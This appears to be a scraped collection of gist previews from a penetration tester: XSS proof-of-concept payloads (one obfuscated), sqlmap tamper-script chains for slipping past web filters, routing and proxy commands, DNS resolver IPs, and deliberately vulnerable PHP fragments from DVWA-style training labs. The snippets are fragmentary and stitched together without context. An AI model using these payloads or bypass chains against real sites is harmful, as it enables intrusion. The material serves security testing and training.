(Preferably) Use a VPN
- AlgoVPN https://github.com/trailofbits/algo
- OpenVPN (AS) https://openvpn.net/index.php/access-server/overview.html
- 3rd party service, e.g. ProtonVPN https://protonvpn.com
Install a proxy tool of choise
" onfocus="alert(1)" name="bounty | |
(Append #bounty to the URL and enjoy your zero interaction XSS ) | |
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// | |
# Internet Explorer, Edge | |
<svg><script>alert(1)<p> | |
# Firefox |
(Preferably) Use a VPN
Install a proxy tool of choise
# All scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
``` | |
# General scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
``` | |
# Microsoft access | |
``` |
ip rule add from $(ip route get 1 | grep -Po '(?<=src )(\S+)') table 128 | |
ip route add table 128 to $(ip route get 1 | grep -Po '(?<=src )(\S+)')/32 dev $(ip -4 route ls | grep default | grep -Po '(?<=dev )(\S+)') | |
ip route add table 128 default via $(ip -4 route ls | grep default | grep -Po '(?<=via )(\S+)') |
I hereby claim:
To claim this, I am signing this object:
NODE_TLS_REJECT_UNAUTHORIZED=0 proxychains4 -f ~/proxychains.conf /Applications/Grammarly.app/Contents/MacOS/Grammarly |
1.2.4.8 | |
103.22.248.62 | |
106.186.17.181 | |
109.69.8.34 | |
109.69.8.51 | |
111.223.252.161 | |
114.114.114.114 | |
114.114.114.119 | |
114.114.115.115 | |
114.114.115.119 |
<?php | |
$html = ""; | |
if ($_SERVER['REQUEST_METHOD'] == "POST") { | |
if (!isset ($_SESSION['last_session_id'])) { | |
$_SESSION['last_session_id'] = 0; | |
} | |
$_SESSION['last_session_id']++; | |
$cookie_value = $_SESSION['last_session_id']; |
<?php | |
if( isset( $_GET[ 'Change' ] ) ) { | |
// Get input | |
$pass_new = $_GET[ 'password_new' ]; | |
$pass_conf = $_GET[ 'password_conf' ]; | |
// Do the passwords match? | |
if( $pass_new == $pass_conf ) { | |
// They do! |
OWASP DVWA
Metasploitable3 + Metasploit Framework